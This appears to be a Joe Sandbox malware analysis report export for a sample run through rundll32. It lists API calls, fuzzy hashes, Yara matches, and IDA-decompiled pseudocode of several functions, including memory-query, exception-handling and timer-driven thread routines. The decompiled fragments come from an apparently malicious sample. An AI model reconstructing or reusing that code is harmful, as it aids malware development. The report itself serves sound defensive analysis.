                                          0x04891ee8
                                          0x04891eeb
                                          0x04891eff
                                          0x04891f02
                                          0x04891f16
                                          0x04891f1b
                                          0x04891f2d
                                          0x04891f30
                                          0x04891f44
                                          0x04891f47
                                          0x04891f5b
                                          0x04891f5e
                                          0x04891f74
                                          0x04891f77
                                          0x04891f8b
                                          0x04891f8e
                                          0x04891fa0
                                          0x04891fa3
                                          0x04891fb7
                                          0x04891fba
                                          0x04891fce
                                          0x04891fd1
                                          0x04891fe5
                                          0x04891fee
                                          0x04891ff1
                                          0x04891ffa
                                          0x04892003
                                          0x0489200b
                                          0x04892013
                                          0x0489201d
                                          0x04892032

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                          • Instruction ID: bab81b52cba49c7c0c518b56af131754d907419d87475fc640d46aad67e96c8a
                                          • Opcode Fuzzy Hash: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                          • Instruction Fuzzy Hash: C322847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B684D9 Relevance: 1.9, APIs: 1, Instructions: 611COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: fc750f3eb89d9d2a8a86cca6900e87b20db082a145dca28283854832f4a92147
                                          • Instruction ID: b5268fd4764d0c73c14be37e436c4059a92a50d34335498df5721ade8393ab39
                                          • Opcode Fuzzy Hash: fc750f3eb89d9d2a8a86cca6900e87b20db082a145dca28283854832f4a92147
                                          • Instruction Fuzzy Hash: 0A22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B70B0E Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: 1a29ac540e9644a6179586f1b150195bbc18a27d224edc75593619937bb5069c
                                          • Instruction ID: fe27e7d40974c9bb21376b6cfbfb614ed2180c720955ec721d592d394e463a95
                                          • Opcode Fuzzy Hash: 1a29ac540e9644a6179586f1b150195bbc18a27d224edc75593619937bb5069c
                                          • Instruction Fuzzy Hash: A542AD30A10B45CFCB25CF69C4906AAF7F1FF49304F54C9AED4AAAB651D334A986CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04898441 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04898441(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x489a380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x489a3c8 = 1;
										__eflags =  *0x489a3c8;
										if( *0x489a3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x489a380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x489a3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x489a380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x489a388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x489a384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x489a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x489a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x489a3c8 = 1;
							__eflags =  *0x489a3c8;
							if( *0x489a3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x489a388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x489a388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x489a3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x489a388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x489a380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x489a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x489a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                          0x0489844b
                                          0x0489844e
                                          0x04898454
                                          0x04898472
                                          0x00000000
                                          0x04898472
                                          0x0489845c
                                          0x04898465
                                          0x0489846b
                                          0x0489847a
                                          0x0489847d
                                          0x04898480
                                          0x0489848a
                                          0x0489848a
                                          0x0489848c
                                          0x0489848f
                                          0x04898491
                                          0x04898491
                                          0x04898493
                                          0x04898496
                                          0x00000000
                                          0x00000000
                                          0x04898498
                                          0x0489849a
                                          0x04898500
                                          0x04898500
                                          0x0489865e
                                          0x00000000
                                          0x0489865e
                                          0x0489849c
                                          0x0489849c
                                          0x048984a0
                                          0x048984a2
                                          0x048984a2
                                          0x048984a2
                                          0x048984a2
                                          0x048984a5
                                          0x048984a6
                                          0x048984a9
                                          0x048984a9
                                          0x048984ad
                                          0x048984b1
                                          0x048984bf
                                          0x048984bf
                                          0x048984c7
                                          0x048984cd
                                          0x048984cf
                                          0x048984d1
                                          0x048984e1
                                          0x048984ee
                                          0x048984f2
                                          0x048984f7
                                          0x048984f9
                                          0x04898577
                                          0x04898577
                                          0x048984fb
                                          0x048984fb
                                          0x048984fb
                                          0x04898579
                                          0x0489857b
                                          0x0489865c
                                          0x0489865c
                                          0x00000000
                                          0x04898581
                                          0x04898581
                                          0x04898588
                                          0x00000000
                                          0x00000000
                                          0x0489858e
                                          0x04898592
                                          0x048985ee
                                          0x048985f0
                                          0x048985f8
                                          0x048985fa
                                          0x048985fc
                                          0x00000000
                                          0x00000000
                                          0x048985fe
                                          0x04898604
                                          0x04898606
                                          0x04898608
                                          0x0489861d
                                          0x0489861d
                                          0x0489861f
                                          0x0489864e
                                          0x04898655
                                          0x00000000
                                          0x04898655
                                          0x04898623
                                          0x04898624
                                          0x04898626
                                          0x04898628
                                          0x04898628
                                          0x0489862a
                                          0x0489862c
                                          0x0489862e
                                          0x04898642
                                          0x04898642
                                          0x04898645
                                          0x04898647
                                          0x04898647
                                          0x04898648
                                          0x04898648
                                          0x00000000
                                          0x04898630
                                          0x04898630
                                          0x04898630
                                          0x04898639
                                          0x0489863a
                                          0x0489863c
                                          0x0489863e
                                          0x0489863e
                                          0x00000000
                                          0x04898630
                                          0x0489862e
                                          0x0489860a
                                          0x04898611
                                          0x04898611
                                          0x04898613
                                          0x00000000
                                          0x00000000
                                          0x04898615
                                          0x04898616
                                          0x04898619
                                          0x0489861b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0489861b
                                          0x00000000
                                          0x04898611
                                          0x04898594
                                          0x04898597
                                          0x0489859c
                                          0x00000000
                                          0x00000000
                                          0x048985a5
                                          0x048985a7
                                          0x048985ad
                                          0x00000000
                                          0x00000000
                                          0x048985b3
                                          0x048985b9
                                          0x00000000
                                          0x00000000
                                          0x048985bf
                                          0x048985c1
                                          0x048985ca
                                          0x048985ce
                                          0x00000000
                                          0x00000000
                                          0x048985d4
                                          0x048985d7
                                          0x048985d9
                                          0x00000000
                                          0x00000000
                                          0x048985e0
                                          0x048985e2
                                          0x00000000
                                          0x00000000
                                          0x048985e4
                                          0x048985e8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048985e8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048984d3
                                          0x048984d3
                                          0x048984d3
                                          0x048984da
                                          0x00000000
                                          0x00000000
                                          0x048984dc
                                          0x048984dd
                                          0x048984df
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048984df
                                          0x04898507
                                          0x04898509
                                          0x00000000
                                          0x00000000
                                          0x04898519
                                          0x0489851b
                                          0x0489851d
                                          0x00000000
                                          0x00000000
                                          0x04898523
                                          0x0489852a
                                          0x04898556
                                          0x04898556
                                          0x04898558
                                          0x0489855a
                                          0x0489856e
                                          0x04898570
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0489855c
                                          0x0489855c
                                          0x0489855c
                                          0x04898565
                                          0x04898566
                                          0x04898568
                                          0x0489856a
                                          0x0489856a
                                          0x00000000
                                          0x0489855c
                                          0x0489852c
                                          0x0489852c
                                          0x0489852f
                                          0x04898531
                                          0x04898543
                                          0x04898543
                                          0x04898546
                                          0x04898548
                                          0x04898548
                                          0x04898549
                                          0x04898549
                                          0x0489854f
                                          0x0489854f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04898533
                                          0x04898533
                                          0x04898533
                                          0x0489853a
                                          0x00000000
                                          0x00000000
                                          0x0489853c
                                          0x0489853c
                                          0x0489853d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0489853d
                                          0x0489853f
                                          0x04898541
                                          0x04898554
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04898554
                                          0x00000000
                                          0x04898541
                                          0x048984b3
                                          0x048984b6
                                          0x048984b9
                                          0x00000000
                                          0x00000000
                                          0x048984bb
                                          0x048984bd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048984bd
                                          0x04898482
                                          0x04898484
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 048984F2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: MemoryQueryVirtual
                                          • String ID:
                                          • API String ID: 2850889275-0
                                          • Opcode ID: d8a1045bf8af83dbd557458d8e232086c1b75a4936fa77f5bbcbc8bdfb05ffe1
                                          • Instruction ID: 00ff7855d906c4b1c3c42b4162144e73534b57bc9b43795cb2fbe660ca3aed2e
                                          • Opcode Fuzzy Hash: d8a1045bf8af83dbd557458d8e232086c1b75a4936fa77f5bbcbc8bdfb05ffe1
                                          • Instruction Fuzzy Hash: 0161A231620E479FDF69AF2CC89462933E1EB86358B2C8F29D846CB290E735FC45C640
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6488B Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B648FB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcessUser
                                          • String ID:
                                          • API String ID: 2217836671-0
                                          • Opcode ID: 24362eacb678cdc53d59a5f7b7002c7097150aec38b1c8520e2b6a4607bbfb60
                                          • Instruction ID: 61e7b0a02cc992e6ba536632611654e40505827a5952b8a5d2bbda7edf283d40
                                          • Opcode Fuzzy Hash: 24362eacb678cdc53d59a5f7b7002c7097150aec38b1c8520e2b6a4607bbfb60
                                          • Instruction Fuzzy Hash: F311DF3210414ABFDF025F98DC05DEA7BA6FF0C368B454258FE1862120CB36C8B1AB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B529B2 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 00B529CA
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorStatus
                                          • String ID:
                                          • API String ID: 1596131371-0
                                          • Opcode ID: ab2cb456d871110efe8615efe5439c35eec03030712be19b4d40890afad3796b
                                          • Instruction ID: 4e8e719d7ca1e6a5eb24dd7c2b59ea44691f7134c19c29df825d2d055568baee
                                          • Opcode Fuzzy Hash: ab2cb456d871110efe8615efe5439c35eec03030712be19b4d40890afad3796b
                                          • Instruction Fuzzy Hash: 2FC012325052026BDF095754DC18A2A7A51EB50301F04481DB54982070CF309890D700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0489821C Relevance: .1, Instructions: 77COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E0489821C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E04898387(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E04898441(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E0489832C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E04898387(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E04898423(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                          0x04898220
                                          0x04898221
                                          0x04898222
                                          0x04898225
                                          0x04898227
                                          0x0489822a
                                          0x0489822b
                                          0x0489822d
                                          0x0489822e
                                          0x0489822f
                                          0x04898232
                                          0x0489823c
                                          0x048982ed
                                          0x048982f4
                                          0x048982fd
                                          0x04898242
                                          0x04898242
                                          0x04898248
                                          0x0489824e
                                          0x04898251
                                          0x04898254
                                          0x04898258
                                          0x0489825d
                                          0x04898262
                                          0x048982e2
                                          0x00000000
                                          0x04898264
                                          0x04898264
                                          0x04898270
                                          0x04898272
                                          0x048982cd
                                          0x048982cd
                                          0x048982d3
                                          0x00000000
                                          0x04898274
                                          0x04898283
                                          0x04898285
                                          0x04898286
                                          0x04898287
                                          0x0489828a
                                          0x0489828a
                                          0x0489828c
                                          0x00000000
                                          0x0489828e
                                          0x0489828e
                                          0x048982d8
                                          0x04898290
                                          0x04898290
                                          0x04898294
                                          0x0489829c
                                          0x048982a1
                                          0x048982a6
                                          0x048982b2
                                          0x048982ba
                                          0x048982c1
                                          0x048982c7
                                          0x048982cb
                                          0x00000000
                                          0x048982cb
                                          0x0489828e
                                          0x0489828c
                                          0x00000000
                                          0x04898272
                                          0x048982e6
                                          0x048982e6
                                          0x048982e6
                                          0x04898262
                                          0x04898302
                                          0x04898309

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                          • Instruction ID: facd1ab3e31aaab51a249cc91ad4254fa219871237396eff3869b6048a3b4b21
                                          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                          • Instruction Fuzzy Hash: 8121C732910A059FDB14EFA8C8808A7BBE5BF46310F498668D915DB245D730FD15CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B737F4 Relevance: .1, Instructions: 77COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                          • Instruction ID: 8a5fb5d08230cb74dca53982b1553cfec7c5973563d57fa4861328061086a04c
                                          • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                          • Instruction Fuzzy Hash: 8721B6729002059FDB10DF68CCC196BBBE5FF44750B05C1A8E96A9B245EB30FA15DBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B71D04 Relevance: 54.5, APIs: 36, Instructions: 457synchronizationtimethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6B138: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B6B16C
                                            • Part of subcall function 00B6B138: GetLastError.KERNEL32 ref: 00B6B22D
                                            • Part of subcall function 00B6B138: ReleaseMutex.KERNEL32(00000000), ref: 00B6B236
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B71DA2
                                            • Part of subcall function 00B547FF: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00B54819
                                            • Part of subcall function 00B547FF: CreateWaitableTimerA.KERNEL32(00B79208,?,?), ref: 00B54836
                                            • Part of subcall function 00B547FF: GetLastError.KERNEL32(?,?), ref: 00B54847
                                            • Part of subcall function 00B547FF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 00B54887
                                            • Part of subcall function 00B547FF: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 00B548A6
                                            • Part of subcall function 00B547FF: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 00B548BC
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B71E05
                                          • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000), ref: 00B71E81
                                          • StrTrimA.SHLWAPI(00000000,?), ref: 00B71EA3
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B71EE3
                                            • Part of subcall function 00B6EBC8: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 00B6EBEA
                                            • Part of subcall function 00B6EBC8: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?), ref: 00B6EC18
                                          • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 00B71F89
                                          • CloseHandle.KERNEL32(?), ref: 00B72218
                                            • Part of subcall function 00B62D5C: WaitForSingleObject.KERNEL32(?,00000000), ref: 00B62D68
                                            • Part of subcall function 00B62D5C: HeapFree.KERNEL32(00000000,?,?), ref: 00B62D96
                                            • Part of subcall function 00B62D5C: ResetEvent.KERNEL32(?,?), ref: 00B62DB0
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B71FBE
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B71FCD
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00B71FFA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00B72014
                                          • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 00B7205C
                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 00B72076
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B7208C
                                          • ReleaseMutex.KERNEL32(?), ref: 00B720A9
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B720BA
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B720C9
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00B720FD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00B72117
                                          • SwitchToThread.KERNEL32 ref: 00B72119
                                          • ReleaseMutex.KERNEL32(?), ref: 00B72123
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B72161
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B7216C
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00B7218F
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00B721A9
                                          • SwitchToThread.KERNEL32 ref: 00B721AB
                                          • ReleaseMutex.KERNEL32(?), ref: 00B721B5
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B721CA
                                          • CloseHandle.KERNEL32(?), ref: 00B7222C
                                          • CloseHandle.KERNEL32(?), ref: 00B72238
                                          • CloseHandle.KERNEL32(?), ref: 00B72244
